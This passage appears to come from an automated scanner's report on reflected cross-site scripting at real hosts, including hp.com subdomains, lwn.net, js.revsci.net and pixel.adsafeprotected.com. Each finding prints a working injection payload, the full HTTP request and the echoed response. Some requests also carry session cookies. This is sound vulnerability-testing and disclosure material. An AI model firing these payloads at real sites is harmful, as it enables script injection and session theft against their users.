The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5152e"><script>alert(1)</script>7a5ede59c82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/stylesheets/site.jsp5152e"><script>alert(1)</script>7a5ede59c82?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:02 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30841


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/stylesheets/site.jsp5152e"><script>alert(1)</script>7a5ede59c82?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.95. https://h41183.www4.hp.com/inflexion/ [jumpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://h41183.www4.hp.com
Path:   /inflexion/

Issue detail

The value of the jumpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313d2"%20style%3dx%3aexpression(alert(1))%20bdc6c99b05a was submitted in the jumpid parameter. This input was echoed as 313d2\" style=x:expression(alert(1)) bdc6c99b05a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion313d2"%20style%3dx%3aexpression(alert(1))%20bdc6c99b05a&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564 HTTP/1.1
Host: h41183.www4.hp.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8r PHP/5.3.6
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 67745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-us" xml:lang="en
...[SNIP]...
<input type="hidden" name="jumpid" value="inflexion313d2\" style=x:expression(alert(1)) bdc6c99b05a" />
...[SNIP]...

3.96. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 8bc34<script>alert(1)</script>efd39a0477d was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G076088bc34<script>alert(1)</script>efd39a0477d HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 04 Sep 2011 16:17:37 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 05 Sep 2011 16:17:37 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 16:17:36 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G076088BC34<SCRIPT>ALERT(1)</SCRIPT>EFD39A0477D" was not recognized.
*/

3.97. http://lwn.net/Articles/456878/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /Articles/456878/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf79"><script>alert(1)</script>dd792ac85a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles2cf79"><script>alert(1)</script>dd792ac85a2/456878/ HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315138581.1; __utmz=196211505.1315138581.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:09 GMT
Server: Apache
Expires: -1
Content-Length: 4300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/Articles2cf79"><script>alert(1)</script>dd792ac85a2/456878/?format=printable" rel="nofollow">
...[SNIP]...

3.98. http://lwn.net/Articles/456878/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /Articles/456878/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload badde"><script>alert(1)</script>19cf5213da2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles/456878badde"><script>alert(1)</script>19cf5213da2/ HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315138581.1; __utmz=196211505.1315138581.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:12 GMT
Server: Apache
Expires: -1
Content-Length: 4300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/Articles/456878badde"><script>alert(1)</script>19cf5213da2/?format=printable" rel="nofollow">
...[SNIP]...

3.99. http://lwn.net/Articles/456878/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /Articles/456878/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f55"><script>alert(1)</script>2fc14d4e749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Articles/456878/?11f55"><script>alert(1)</script>2fc14d4e749=1 HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315138581.1; __utmz=196211505.1315138581.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:55:07 GMT
Server: Apache
Expires: -1
Content-Length: 18612
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</
...[SNIP]...
<a href="/Articles/456878/?11f55"><script>alert(1)</script>2fc14d4e749=1?format=printable" rel="nofollow">
...[SNIP]...

3.100. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb31"><script>alert(1)</script>b977975e439 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles7bb31"><script>alert(1)</script>b977975e439/456878/%22onmouseover=prompt(%22E-mail%22)%3E HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315187735.2; __utmz=196211505.1315187741.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=196211505.1.10.1315187741; __utmc=196211505

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:53 GMT
Server: Apache
Expires: -1
Content-Length: 4338
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/articles7bb31"><script>alert(1)</script>b977975e439/456878/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow">
...[SNIP]...

3.101. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8fd"><script>alert(1)</script>35c56d0c976 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/4568781c8fd"><script>alert(1)</script>35c56d0c976/%22onmouseover=prompt(%22E-mail%22)%3E HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315187735.2; __utmz=196211505.1315187741.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=196211505.1.10.1315187741; __utmc=196211505

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:56 GMT
Server: Apache
Expires: -1
Content-Length: 4338
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/articles/4568781c8fd"><script>alert(1)</script>35c56d0c976/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow">
...[SNIP]...

3.102. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cab"><script>alert(1)</script>8b9a2d74c08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/456878/%22onmouseoverd8cab"><script>alert(1)</script>8b9a2d74c08=prompt(%22E-mail%22)%3E HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315187735.2; __utmz=196211505.1315187741.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=196211505.1.10.1315187741; __utmc=196211505

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:58 GMT
Server: Apache
Expires: -1
Content-Length: 4338
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/articles/456878/%22onmouseoverd8cab"><script>alert(1)</script>8b9a2d74c08=prompt(%22E-mail%22)%3E?format=printable" rel="nofollow">
...[SNIP]...

3.103. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

Issue detail

The value of the format request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec0c"><script>alert(1)</script>2fce89b00d5 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable2ec0c"><script>alert(1)</script>2fce89b00d5 HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315187735.2; __utmz=196211505.1315187741.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=196211505.2.10.1315187741; __utmc=196211505

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:56:03 GMT
Server: Apache
Expires: -1
Content-Length: 4355
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?format=printable2ec0c"><script>alert(1)</script>2fce89b00d5?format=printable" rel="nofollow">
...[SNIP]...

3.104. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lwn.net
Path:   /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81aab"><script>alert(1)</script>691fb0a816a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?81aab"><script>alert(1)</script>691fb0a816a=1 HTTP/1.1
Host: lwn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=196211505.1342941290.1315138581.1315138581.1315187735.2; __utmz=196211505.1315187741.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=196211505.1.10.1315187741; __utmc=196211505

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 01:55:51 GMT
Server: Apache
Expires: -1
Content-Length: 4341
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><title>404 - Not Found [LWN.net]</title>
<meta HTTP-
...[SNIP]...
<a href="/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E?81aab"><script>alert(1)</script>691fb0a816a=1?format=printable" rel="nofollow">
...[SNIP]...

3.105. http://pixel.adsafeprotected.com/jspix [anId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5a70"-alert(1)-"ac321b82b88 was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144f5a70"-alert(1)-"ac321b82b88&pubId=19240&campId=161441 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E81A015BB8B9EE5C806AFF54FF4EB670; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:54 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3D
...[SNIP]...
num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144f5a70"-alert(1)-"ac321b82b88&pubId=19240&campId=161441",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsp73dje"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var
...[SNIP]...

3.106. http://pixel.adsafeprotected.com/jspix [campId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99de3"-alert(1)-"c090c6b65a8 was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=19240&campId=16144199de3"-alert(1)-"c090c6b65a8 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B1AACC4AF8BC204CA4CB77100B164407; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:55 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3D
...[SNIP]...
nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=19240&campId=16144199de3"-alert(1)-"c090c6b65a8",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsp73dph"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log",
...[SNIP]...

3.107. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6942"-alert(1)-"91db8ff3473 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=19240&campId=161441&b6942"-alert(1)-"91db8ff3473=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E1323870265AF82DEF33FC529D00C2E5; Path=/
Content-Type: text/javascript
Date: Mon, 05 Sep 2011 02:30:55 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3D
...[SNIP]...
